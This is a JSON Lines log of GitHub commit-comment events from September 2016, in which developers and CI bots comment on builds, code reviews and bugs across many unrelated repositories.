{"id":"4629391646","type":"CommitCommentEvent","actor":{"login":"jh-bate"},"repo":{"name":"tidepool-org/tideline"},"payload":{"comment":{"id":19204390,"position":null,"line":null,"path":null,"commit_id":"a3cefd54785fbf8863fb8c0ee540d1f6b958288e","created_at":"2016-09-28T09:06:25Z","updated_at":"2016-09-28T09:06:25Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [<ux: 1 dev:5 tst: 1> [blip] [device settings] Update design for Tandem pump Device Settings](https://trello.com/c/tbc9evMS/3-ux-1-dev-5-tst-1-blip-device-settings-update-design-for-tandem-pump-device-settings)"}},"created_at":"2016-09-28T09:06:25Z"}
{"id":"4629393675","type":"CommitCommentEvent","actor":{"login":"akbertram"},"repo":{"name":"bedatadriven/renjin"},"payload":{"comment":{"id":19204393,"position":null,"line":null,"path":null,"commit_id":"d1f2563061b361646d3aedd0712be9a8063c2d1c","created_at":"2016-09-28T09:06:48Z","updated_at":"2016-09-28T09:06:48Z","body":"Please run the script and then check in the generated test sources."}},"created_at":"2016-09-28T09:06:48Z"}
{"id":"4629396444","type":"CommitCommentEvent","actor":{"login":"tangruisheng"},"repo":{"name":"tangruisheng/daily-note"},"payload":{"comment":{"id":19204399,"position":null,"line":null,"path":null,"commit_id":"36d04d5e39edd52099037ce75fdc8c08e2ca7f82","created_at":"2016-09-28T09:07:22Z","updated_at":"2016-09-28T09:07:22Z","body":"base64"}},"created_at":"2016-09-28T09:07:22Z"}
{"id":"4629397417","type":"CommitCommentEvent","actor":{"login":"daehn"},"repo":{"name":"wireapp/wire-ios-sync-engine"},"payload":{"comment":{"id":19204400,"position":32,"line":32,"path":"Source/E2EE/CBCryptoBox+UpdateEvents.h","commit_id":"117469725e9609ad1d7037c64e3c40b7b08cfbff","created_at":"2016-09-28T09:07:34Z","updated_at":"2016-09-28T09:07:34Z","body":"This method now can not be found anymore and the build fails, I assume it moved into the new framework, but maybe the access control is not public?"}},"created_at":"2016-09-28T09:07:34Z"}
{"id":"4629401187","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19204410,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-28T09:08:21Z","updated_at":"2016-09-28T09:08:21Z","body":"when you add a new class that doesn't extend any Yii class, you're just doing something wrong. "}},"created_at":"2016-09-28T09:08:21Z"}
{"id":"4629403118","type":"CommitCommentEvent","actor":{"login":"jackregnart"},"repo":{"name":"finddx/cdx"},"payload":{"comment":{"id":19204412,"position":1,"line":103,"path":"cdx_core/app/controllers/patients_controller.rb","commit_id":"a68b3b978cedd0dd3dbe55491ca339e018c08344","created_at":"2016-09-28T09:08:46Z","updated_at":"2016-09-28T09:08:46Z","body":"Probably should have renamed this method now it doesn't do this anymore :)"}},"created_at":"2016-09-28T09:08:46Z"}
{"id":"4629403251","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19204413,"position":null,"line":null,"path":null,"commit_id":"497fc46c6c3b1b08640b58df73066eec26fe70d5","created_at":"2016-09-28T09:08:48Z","updated_at":"2016-09-28T09:08:48Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 273](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1247&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Compilation error: Xbim.Geometry.Engine.Interop\\Xbim.Geometry.Engine.Interop.csproj (new) Build time: 00:26:33"}},"created_at":"2016-09-28T09:08:48Z"}
{"id":"4629403534","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19204415,"position":null,"line":null,"path":null,"commit_id":"99480e53d2371c385c3e2eb1b37bca6f2e6ac7e7","created_at":"2016-09-28T09:08:51Z","updated_at":"2016-09-28T09:08:51Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 274](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1248&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-28T09:08:51Z"}
{"id":"4629405692","type":"CommitCommentEvent","actor":{"login":"lubieciastka"},"repo":{"name":"lubieciastka/bomberman-temp"},"payload":{"comment":{"id":19204418,"position":null,"line":null,"path":null,"commit_id":"ca5cc4c83de9116c4073d8d10d72df40e8bfb9ca","created_at":"2016-09-28T09:09:18Z","updated_at":"2016-09-28T09:09:18Z","body":"![CSI](http://s2.quickmeme.com/img/02/02d6885063eca80b917a17efd2910945ea409dd0487bdf2f0f80c03271c32ee1.jpg)"}},"created_at":"2016-09-28T09:09:18Z"}
{"id":"4629407154","type":"CommitCommentEvent","actor":{"login":"simonwelsh"},"repo":{"name":"facebook/hhvm"},"payload":{"comment":{"id":19204421,"position":null,"line":null,"path":null,"commit_id":"18188097ed6c66ebb967d9f6706b32a652114f7e","created_at":"2016-09-28T09:09:34Z","updated_at":"2016-09-28T09:09:34Z","body":"The main benefit from my perspective if that it makes it a lot easy to know if a commit has made the cut or not. Is there something else you could do when cutting the branch to designate that?"}},"created_at":"2016-09-28T09:09:34Z"}
{"id":"4629408517","type":"CommitCommentEvent","actor":{"login":"jiangcaijun"},"repo":{"name":"jiangcaijun/Online-shopping-mall-system"},"payload":{"comment":{"id":19204422,"position":null,"line":null,"path":null,"commit_id":"40f3ece2ef4541afe2c35555022df9dd9e8cc2c9","created_at":"2016-09-28T09:09:52Z","updated_at":"2016-09-28T09:09:52Z","body":" 《网上积分商城系统》\t\t\r\n  基于web页面，数据库为Oracle，采用MVC结构，分为客户端与管理员端。\t\t \r\n  另外该项目还有一些不尽如人意的地方，需要后期修缮。"}},"created_at":"2016-09-28T09:09:52Z"}
{"id":"4629408699","type":"CommitCommentEvent","actor":{"login":"lu40"},"repo":{"name":"Openki/Openki"},"payload":{"comment":{"id":19204424,"position":null,"line":null,"path":null,"commit_id":"d4a6b423579584fb07b1524699b2cff2cd80e60a","created_at":"2016-09-28T09:09:54Z","updated_at":"2016-09-28T09:09:54Z","body":"#8 "}},"created_at":"2016-09-28T09:09:54Z"}
{"id":"4629417705","type":"CommitCommentEvent","actor":{"login":"LukasCBossert"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19204441,"position":5,"line":507,"path":"2016-02/content/Raza.tex","commit_id":"cb34dba58edbb67049627baa8b7913a4d09e6e97","created_at":"2016-09-28T09:11:36Z","updated_at":"2016-09-28T09:11:36Z","body":"without `s`, that is why it wasnt recognized. "}},"created_at":"2016-09-28T09:11:36Z"}
{"id":"4629418728","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"php-build/php-build"},"payload":{"comment":{"id":19204442,"position":null,"line":null,"path":null,"commit_id":"ee8b8b7173607c6e491425e39f106aecab339e37","created_at":"2016-09-28T09:11:49Z","updated_at":"2016-09-28T09:11:49Z","body":"Yeh, well, it was removed again in 2.4.1."}},"created_at":"2016-09-28T09:11:49Z"}
{"id":"4629421689","type":"CommitCommentEvent","actor":{"login":"LukasCBossert"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19204449,"position":7,"line":553,"path":"2016-02/content/Raza.tex","commit_id":"3411b9eeec612ad525a3d0547b2421102987a097","created_at":"2016-09-28T09:12:22Z","updated_at":"2016-09-28T09:12:22Z","body":"@jvandg `\\citeauthor` doesnt work since there is no author defined. instead plain `\\cite` works"}},"created_at":"2016-09-28T09:12:22Z"}
{"id":"4629423800","type":"CommitCommentEvent","actor":{"login":"luwenyun"},"repo":{"name":"luwenyun/first"},"payload":{"comment":{"id":19204453,"position":null,"line":null,"path":null,"commit_id":"b74208a29d445853cc4756e6411ea743a55c766a","created_at":"2016-09-28T09:12:48Z","updated_at":"2016-09-28T09:12:48Z","body":"this is second"}},"created_at":"2016-09-28T09:12:48Z"}
{"id":"4629424635","type":"CommitCommentEvent","actor":{"login":"jackregnart"},"repo":{"name":"finddx/cdx"},"payload":{"comment":{"id":19204456,"position":1,"line":103,"path":"cdx_core/app/controllers/patients_controller.rb","commit_id":"a68b3b978cedd0dd3dbe55491ca339e018c08344","created_at":"2016-09-28T09:12:57Z","updated_at":"2016-09-28T09:12:57Z","body":"Actually. I'd probably combine this with the update method and only do `@patient.valid?` on `.new_record?`.\r\n\r\nOne day we can remove this ugliness entirely :)"}},"created_at":"2016-09-28T09:12:57Z"}
{"id":"4629427605","type":"CommitCommentEvent","actor":{"login":"Minimata"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19204461,"position":73,"line":81,"path":"planet/js/scene.js","commit_id":"e07072c4298da68209d785ca8b83618293062f85","created_at":"2016-09-28T09:13:34Z","updated_at":"2016-09-28T09:13:34Z","body":"console.exception is not recognized natively it seems.\r\nfinally is leaving =)"}},"created_at":"2016-09-28T09:13:34Z"}
{"id":"4629428727","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19204463,"position":157,"line":682,"path":"cura/Settings/MachineManager.py","commit_id":"4bb6ddaf28ae2f5a93d59d25fa479d594aff1d5c","created_at":"2016-09-28T09:13:47Z","updated_at":"2016-09-28T09:13:47Z","body":"```_getQualityProfilesByQualityName``` ?"}},"created_at":"2016-09-28T09:13:47Z"}
{"id":"4629431025","type":"CommitCommentEvent","actor":{"login":"samdark"},"repo":{"name":"yiisoft/yii2-app-advanced"},"payload":{"comment":{"id":19204471,"position":2,"line":2,"path":"backend/config/main.php","commit_id":"b2596e9960c477aac907da53e3a3e4e46efe590c","created_at":"2016-09-28T09:14:13Z","updated_at":"2016-09-28T09:14:13Z","body":"Why?"}},"created_at":"2016-09-28T09:14:13Z"}
{"id":"4629434777","type":"CommitCommentEvent","actor":{"login":"moeller0"},"repo":{"name":"dtaht/tc-adv"},"payload":{"comment":{"id":19204482,"position":null,"line":null,"path":null,"commit_id":"2c7ddd720a85f1814b9099945f6981e4ab8b8105","created_at":"2016-09-28T09:14:56Z","updated_at":"2016-09-28T09:14:56Z","body":"/*\r\n +\t\t * DOCSIS overhead figures courtesy of Greg White @ CableLabs.\r\n +\t\t * The \"-ip\" versions include the Ethernet frame header, in case\r\n +\t\t * you are shaping an IP interface instead of an Ethernet one.\r\n +\t\t */\r\n\r\n\r\nThis seems rather unexpected, for ATM/PTM the same is achieved by using the via-ethernet keyword, why treat DOCSIS any different? \r\nI have mentioned in the past the overhead encapsulation user interface is something only a father/mother could love, it is far from self-explantory or well-documented. And this here is not making it any better, as documenting the whole thing, should anybody ever start this quest, is much easier when an interface is predictable and systematic..."}},"created_at":"2016-09-28T09:14:56Z"}
{"id":"4629437220","type":"CommitCommentEvent","actor":{"login":"schleichardt"},"repo":{"name":"commercetools/commercetools-jvm-sdk"},"payload":{"comment":{"id":19204485,"position":17,"line":275,"path":"commercetools-models/src/main/java/io/sphere/sdk/customers/Customer.java","commit_id":"ded84d955b37e092f458f9c72573ae9594e66212","created_at":"2016-09-28T09:15:24Z","updated_at":"2016-09-28T09:15:24Z","body":"@ccsalazarr-commercetools please fix the formatting"}},"created_at":"2016-09-28T09:15:24Z"}
{"id":"4629441024","type":"CommitCommentEvent","actor":{"login":"Seany1992"},"repo":{"name":"hawmember/TimeJump-MG1"},"payload":{"comment":{"id":19204492,"position":null,"line":null,"path":null,"commit_id":"9f05a02ae98756869ca41b1e56f1ef89e0ca614d","created_at":"2016-09-28T09:16:08Z","updated_at":"2016-09-28T09:16:08Z","body":"nice"}},"created_at":"2016-09-28T09:16:08Z"}
{"id":"4629441432","type":"CommitCommentEvent","actor":{"login":"lyhcode"},"repo":{"name":"trunk-studio/cargocms"},"payload":{"comment":{"id":19204493,"position":2,"line":2,"path":"config/mail.js","commit_id":"cf787cd0f70c5df5dd498837286760e413a53adc","created_at":"2016-09-28T09:16:13Z","updated_at":"2016-09-28T09:16:13Z","body":"英文單字拼錯"}},"created_at":"2016-09-28T09:16:13Z"}
{"id":"4629443914","type":"CommitCommentEvent","actor":{"login":"lovep10"},"repo":{"name":"steven676/nook_kernel"},"payload":{"comment":{"id":19204501,"position":null,"line":null,"path":null,"commit_id":"4b51e605cb5deff9dad6ed89fc7c021489f29bf1","created_at":"2016-09-28T09:16:43Z","updated_at":"2016-09-28T09:16:43Z","body":"4b51e60"}},"created_at":"2016-09-28T09:16:43Z"}
{"id":"4629448972","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19204509,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-28T09:17:44Z","updated_at":"2016-09-28T09:17:44Z","body":"You mean the AjaxHelper class, or the JsonObject classes?"}},"created_at":"2016-09-28T09:17:44Z"}
{"id":"4629449022","type":"CommitCommentEvent","actor":{"login":"HerringtonDarkholme"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":19204510,"position":31,"line":852,"path":"node/node.d.ts","commit_id":"9b6a4f0c872faa9b2bd768965e61a2e7ad1ce912","created_at":"2016-09-28T09:17:44Z","updated_at":"2016-09-28T09:17:44Z","body":"CompleterResult is probably wrong. https://nodejs.org/dist/latest-v6.x/docs/api/readline.html#readline_readline_createinterface_options"}},"created_at":"2016-09-28T09:17:44Z"}
{"id":"4629456984","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19204525,"position":null,"line":null,"path":null,"commit_id":"dd34e42e3de1f9c2240d33a8c4830b000b7007e3","created_at":"2016-09-28T09:19:22Z","updated_at":"2016-09-28T09:19:22Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1186](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14447&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-28T09:19:22Z"}
{"id":"4629457892","type":"CommitCommentEvent","actor":{"login":"lovep10"},"repo":{"name":"steven676/nook_kernel"},"payload":{"comment":{"id":19204529,"position":14,"line":27,"path":"drivers/mmc/core/debugfs.c","commit_id":"4b51e605cb5deff9dad6ed89fc7c021489f29bf1","created_at":"2016-09-28T09:19:33Z","updated_at":"2016-09-28T09:19:33Z","body":"4b51e60"}},"created_at":"2016-09-28T09:19:33Z"}
{"id":"4629462936","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19204542,"position":48,"line":582,"path":"cura/Settings/MachineManager.py","commit_id":"bfa92b6b400ef257421d311d9739e964f1f69692","created_at":"2016-09-28T09:20:32Z","updated_at":"2016-09-28T09:20:32Z","body":"Bit of logging that we had to do a fallback would be nice. "}},"created_at":"2016-09-28T09:20:32Z"}
{"id":"4629466102","type":"CommitCommentEvent","actor":{"login":"GertjanSmits"},"repo":{"name":"appcelerator/titanium_mobile"},"payload":{"comment":{"id":19204548,"position":null,"line":null,"path":null,"commit_id":"c2407cdfd53ba4190ceae582d788b658bbc30dd7","created_at":"2016-09-28T09:21:10Z","updated_at":"2016-09-28T09:21:10Z","body":"Not sure why this is done. Are we not allowed to use hardware accelerated WebViews from Honeycomb (3.0) anymore? This commit causes really bad performance. It almost looks like <= was meant, instead of >=.\r\n\r\nSee: https://jira.appcelerator.org/browse/AC-4479"}},"created_at":"2016-09-28T09:21:10Z"}
{"id":"4629468628","type":"CommitCommentEvent","actor":{"login":"elpaso"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19204553,"position":null,"line":null,"path":null,"commit_id":"89d4998510bccbf7817671171c25cf71deab6f9a","created_at":"2016-09-28T09:21:39Z","updated_at":"2016-09-28T09:21:39Z","body":"@nyalldawson yes, you can change the port by setting an env var: https://github.com/qgis/QGIS/blob/master/tests/src/python/qgis_wrapped_server.py#L31\r\nDo you think that the problem is caused from the different concurrent builds? If that is the case, maybe there is something in the Travis env that we can use to avoid port clashing (for example a build counter and we could make port 6666 + $BUILD_COUNTER or something similar)."}},"created_at":"2016-09-28T09:21:39Z"}
{"id":"4629471428","type":"CommitCommentEvent","actor":{"login":"jschwartzenberg"},"repo":{"name":"stsp/dosemu2"},"payload":{"comment":{"id":19204559,"position":null,"line":null,"path":null,"commit_id":"7374a6e0978ee4d35f764401719a027034c0173d","created_at":"2016-09-28T09:22:10Z","updated_at":"2016-09-28T09:22:10Z","body":"But possibly this would work better with another serial driver. The video I made was also done with a serial port mouse in combination with this 4D wheel mouse driver. Potentially there could be an existing serial driver which handles both scrolling and absolute coordinates properly."}},"created_at":"2016-09-28T09:22:10Z"}
{"id":"4629472456","type":"CommitCommentEvent","actor":{"login":"tolot27"},"repo":{"name":"isovic/graphmap"},"payload":{"comment":{"id":19204560,"position":null,"line":null,"path":null,"commit_id":"b368a3f732ef14743ecaac25cc4e121462f9ab46","created_at":"2016-09-28T09:22:22Z","updated_at":"2016-09-28T09:22:22Z","body":"This does not fix the issue. The issue is here: https://github.com/isovic/graphmap/blob/7f23b6907a7c282c84055426357538fd168f4bc9/src/containers/path_graph_entry.cc#L377\r\n`i` increases in the for loop, even if `alignments_[i].is_aligned` is false."}},"created_at":"2016-09-28T09:22:22Z"}
{"id":"4629475854","type":"CommitCommentEvent","actor":{"login":"artem-solovev"},"repo":{"name":"artem-solovev/artfolio"},"payload":{"comment":{"id":19204563,"position":null,"line":null,"path":null,"commit_id":"03e436ef58ab5a2beac829536ea04cc3e7f82209","created_at":"2016-09-28T09:23:03Z","updated_at":"2016-09-28T09:23:03Z","body":"#1 Well done."}},"created_at":"2016-09-28T09:23:03Z"}
{"id":"4629477136","type":"CommitCommentEvent","actor":{"login":"jcadduono"},"repo":{"name":"offensive-security/kali-nethunter"},"payload":{"comment":{"id":19204567,"position":null,"line":null,"path":null,"commit_id":"f64881e370a16f4004f73718a0d0462325736e44","created_at":"2016-09-28T09:23:18Z","updated_at":"2016-09-28T09:23:18Z","body":"not sure what's up with github but building the chroot freezes very often for me on\r\n```sh\r\nProcessing triggers for libgdk-pixbuf2.0-0:armhf (2.34.0-1) ...\r\nW: --force-yes is deprecated, use one of the options starting with --allow instead.\r\nRemoving 'local diversion of /usr/sbin/invoke-rc.d to /usr/sbin/invoke-rc.d.chroot'\r\n/third-stage: line 25: a2enmod: command not found\r\n/third-stage: line 28: a2dissite: command not found\r\n/third-stage: line 29: a2ensite: command not found\r\nCloning into 'proxmark3'...\r\nremote: Counting objects: 9424, done.\r\n```\r\nperhaps adding --depth 1 to it could do something to remedy it\r\nmaybe an issue with git under qemu :S"}},"created_at":"2016-09-28T09:23:18Z"}
{"id":"4629478344","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19204572,"position":null,"line":null,"path":null,"commit_id":"96e1aa5a344300d3bf0018af0c6a5e63b70ab7db","created_at":"2016-09-28T09:23:33Z","updated_at":"2016-09-28T09:23:33Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1187](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14451&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-28T09:23:33Z"}
{"id":"4629478853","type":"CommitCommentEvent","actor":{"login":"daehn"},"repo":{"name":"wireapp/wire-ios-sync-engine"},"payload":{"comment":{"id":19204575,"position":32,"line":32,"path":"Source/E2EE/CBCryptoBox+UpdateEvents.h","commit_id":"117469725e9609ad1d7037c64e3c40b7b08cfbff","created_at":"2016-09-28T09:23:38Z","updated_at":"2016-09-28T09:23:38Z","body":"Found the issue, it was a mission import, fixed with 88500ed043fa65e720aec89d592ed94b4e40f143."}},"created_at":"2016-09-28T09:23:38Z"}
{"id":"4629479702","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19204576,"position":null,"line":null,"path":null,"commit_id":"7939db5e0df1fb4e50149b2188fc48b6276e013b","created_at":"2016-09-28T09:23:49Z","updated_at":"2016-09-28T09:23:49Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1188](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14452&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-28T09:23:49Z"}
{"id":"4629483718","type":"CommitCommentEvent","actor":{"login":"QinFuping"},"repo":{"name":"QinFuping/Leon"},"payload":{"comment":{"id":19204585,"position":null,"line":null,"path":null,"commit_id":"b0ec2791fbd21ec5a30f4d258c2d054237f48f88","created_at":"2016-09-28T09:24:35Z","updated_at":"2016-09-28T09:24:35Z","body":"这是一个测试"}},"created_at":"2016-09-28T09:24:35Z"}
{"id":"4629486167","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19204588,"position":null,"line":null,"path":null,"commit_id":"1e5f80c0dc73eb3fcff156f2d1458f21ec00c377","created_at":"2016-09-28T09:25:06Z","updated_at":"2016-09-28T09:25:06Z","body":"I don't know. Like we said when we spoke about it last time, the JS refactorisation will not come before we agree in which JavaScript framework we'll use. \r\n\r\nBut if I had to do such a thing, I'd first spend some time to at least check in the Yii community who tried to do something like that by the past, and how. I would have a look if there is any standardized method, recommendation, etc. \r\n\r\nProtip: when you create a class that doesn't inherit any class from the framework you're using, then you're doing something wrong. That's not specific to Yii, nor to PHP. \r\n\r\n\r\n\r\n"}},"created_at":"2016-09-28T09:25:06Z"}
{"id":"4629491130","type":"CommitCommentEvent","actor":{"login":"juliusosokinas"},"repo":{"name":"sliob/carles_test"},"payload":{"comment":{"id":19204600,"position":null,"line":null,"path":null,"commit_id":"41bccf64be22bf005d0b83eee89f2a816e5d009e","created_at":"2016-09-28T09:26:04Z","updated_at":"2016-09-28T09:26:04Z","body":"Hi @sliob. *.pyc files should not  be commited. Ignore them on .gitignore 👍 "}},"created_at":"2016-09-28T09:26:04Z"}
{"id":"4629492064","type":"CommitCommentEvent","actor":{"login":"tomjenkinson"},"repo":{"name":"mmusgrov/narayana"},"payload":{"comment":{"id":19204601,"position":5,"line":106,"path":"ArjunaJTS/idl/idlj-j9/pom.xml","commit_id":"4620d5895ae47ec85ea0d8e9ca157022992c4420","created_at":"2016-09-28T09:26:14Z","updated_at":"2016-09-28T09:26:14Z","body":"I couldn't agree more"}},"created_at":"2016-09-28T09:26:14Z"}
{"id":"4629495737","type":"CommitCommentEvent","actor":{"login":"gairon"},"repo":{"name":"angular/material"},"payload":{"comment":{"id":19204609,"position":34,"line":148,"path":"src/components/virtualRepeat/virtualRepeater.js","commit_id":"79dcbf733f677a0d3a37cd1e20245fdeb04bf8a4","created_at":"2016-09-28T09:26:56Z","updated_at":"2016-09-28T09:26:56Z","body":"Looks like that line of code produce a wrong recalculation for `newEndIndex` in `VirtualRepeatController.prototype.updateIndexes_` and after it `md-autocomplete` become very slow especially in IE"}},"created_at":"2016-09-28T09:26:56Z"}
{"id":"4629498499","type":"CommitCommentEvent","actor":{"login":"irond13"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19204615,"position":5,"line":32,"path":"lib/hooks/cors/index.js","commit_id":"f80252f66edc0bf00cf6ed317d9a3e68b4e8d948","created_at":"2016-09-28T09:27:28Z","updated_at":"2016-09-28T09:27:28Z","body":"This is a breaking change which requires at least a minor version bump according to semver. Currently you have published this change to 0.12.5 which will cause a change in behaviour for those who depend on 0.12.x."}},"created_at":"2016-09-28T09:27:28Z"}
{"id":"4629499320","type":"CommitCommentEvent","actor":{"login":"hovren"},"repo":{"name":"stevenlovegrove/Sophus"},"payload":{"comment":{"id":19204618,"position":null,"line":null,"path":null,"commit_id":"61cb86723b1040115d79650755b4cbde18efb09f","created_at":"2016-09-28T09:27:39Z","updated_at":"2016-09-28T09:27:39Z","body":"Trying to compile Sophus with Ceres 1.11, Eigen 3.2.9 and gcc 4.8.4 gives me the following type of error\r\n\r\n```\r\n/home/hanov56/Code/Sophus/sophus/so3.hpp:127:3: error: ‘EIGEN_DEVICE_FUNC’ does not name a type\r\n   EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE\r\n```\r\n\r\nReverting to the previous commit (b474) works fine."}},"created_at":"2016-09-28T09:27:39Z"}
{"id":"4629506037","type":"CommitCommentEvent","actor":{"login":"vishal1shukla2"},"repo":{"name":"krishhub/Students"},"payload":{"comment":{"id":19204631,"position":13,"line":39,"path":"app/components/students/student.service.js","commit_id":"329c2f126fd9646cfeedaad4e2a9e432f71853de","created_at":"2016-09-28T09:28:57Z","updated_at":"2016-09-28T09:28:57Z","body":"I'll need to think about this. \r\n\r\nIdeal way would be to do it the way its done in AlertService.js in ILA. See $scope.saveDashboard method in ui/components/dashboard/new-dashboard.controller.js. But I would also need to understand that code properly - can't understand all parts of that code, which comes through one of the code generator (jhipster plugin of yoman)\r\n\r\nYou can keep it as-is as of now."}},"created_at":"2016-09-28T09:28:57Z"}
{"id":"4629506328","type":"CommitCommentEvent","actor":{"login":"5obol"},"repo":{"name":"puppetlabs/puppetlabs-azure"},"payload":{"comment":{"id":19204632,"position":null,"line":null,"path":null,"commit_id":"6393107572687eeefb168bab85701a7f0f390e18","created_at":"2016-09-28T09:29:00Z","updated_at":"2016-09-28T09:29:00Z","body":"Hi, \r\nWe're using the latest commit( Latest commit 22aa570  8 days ago ) to provision in azure. The below two features aren't working:\r\nline 14 arm_vm_devtest.pp:  $public_ip_allocation_method = None,\r\nline 15 arm_vm_devtest.pp: $private_ip_allocation_method = Dynamic,\r\n\r\nIf I hash out the first one then I'm getting same error for line 15. Removing both stops erroring out.\r\n\r\nPS C:\\Users\\azureuser> puppet agent -t --environment feature_azure_provisioning\r\nInfo: Using configured environment 'feature_azure_provisioning'\r\nInfo: Retrieving pluginfacts\r\nInfo: Retrieving plugin\r\nInfo: Loading facts\r\nError: Could not retrieve catalog from remote server: Error 400 on SERVER: Evaluation Error: Error while evaluating a Re\r\nsource Statement, Evaluation Error: Resource type not found: None at /etc/puppetlabs/code/environments/feature_azure_pro\r\nvisioning/modules/provisioning/manifests/azure/windows/arm_vm_devtest.pp:14:34 on node azw-papp051\r\nWarning: Not using cache on failed catalog\r\nError: Could not retrieve catalog; skipping run\r\nPS C:\\Users\\azureuser>\r\n\r\n\r\n"}},"created_at":"2016-09-28T09:29:00Z"}
{"id":"4629509505","type":"CommitCommentEvent","actor":{"login":"Liamp123"},"repo":{"name":"jaamiem/HTML"},"payload":{"comment":{"id":19204636,"position":4,"line":9,"path":"index.html","commit_id":"390986e6bd4a3fede011c8489dfa5932e45193d9","created_at":"2016-09-28T09:29:38Z","updated_at":"2016-09-28T09:29:38Z","body":"Test comment"}},"created_at":"2016-09-28T09:29:38Z"}
{"id":"4629511784","type":"CommitCommentEvent","actor":{"login":"adrihack"},"repo":{"name":"robinz40/test01"},"payload":{"comment":{"id":19204644,"position":null,"line":null,"path":null,"commit_id":"b58aff9091230ed09d641da5e8da864ce9e3cbba","created_at":"2016-09-28T09:30:07Z","updated_at":"2016-09-28T09:30:07Z","body":"> ## **````**"}},"created_at":"2016-09-28T09:30:07Z"}
{"id":"4629512794","type":"CommitCommentEvent","actor":{"login":"jtopper"},"repo":{"name":"puppetlabs/puppetlabs-mysql"},"payload":{"comment":{"id":19204650,"position":9,"line":35,"path":"lib/puppet/provider/mysql.rb","commit_id":"2a888f714d68fb7cbd31677d263b83ac0d7ce028","created_at":"2016-09-28T09:30:17Z","updated_at":"2016-09-28T09:30:17Z","body":"Hi @HelenCampbell, this change shouldn't be necessary, since the implementation of the `mysqld_version` fact I added in #852 implements the fact using `exec('mysqld -V')` already.\r\n\r\nThe use case for us here is that if we're running a remote MySQL, we can drop a custom fact for `mysqld_version` under `facts.d`, and if that's absent we'll attempt to use the `mysqld -V` call as a fallback.  \r\n\r\nOn hosts where there's no `mysqld` or custom fact set, this code now attempts to call `mysqld -V` twice, with the second invocation failing noisily and blowing up the puppet run.  I believe this change should be reverted, but I don't fully understand what motivated your change here."}},"created_at":"2016-09-28T09:30:17Z"}
{"id":"4629514560","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19204662,"position":null,"line":null,"path":null,"commit_id":"dd34e42e3de1f9c2240d33a8c4830b000b7007e3","created_at":"2016-09-28T09:30:39Z","updated_at":"2016-09-28T09:30:39Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1186](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14447&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 2 (2 new), passed: 231, ignored: 3 Build time: 00:11:17\n### Failed tests\n```\norg.genivi.sota.core.PackageResourceWordSpec: <no details avaliable>\n\norg.genivi.sota.core.DeviceResourceSpec.returns vehicle status even if Vin is in device registry but not local db: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-28T09:30:39Z"}
{"id":"4629516488","type":"CommitCommentEvent","actor":{"login":"vriera"},"repo":{"name":"open-source-parsers/jsoncpp"},"payload":{"comment":{"id":19204667,"position":null,"line":null,"path":null,"commit_id":"4b45b52f4ca64a403716842baae53a6a5a5231eb","created_at":"2016-09-28T09:31:03Z","updated_at":"2016-09-28T09:31:03Z","body":"This commit log is wrong. What is doing is fixing a typo (typdef by typedef)."}},"created_at":"2016-09-28T09:31:03Z"}
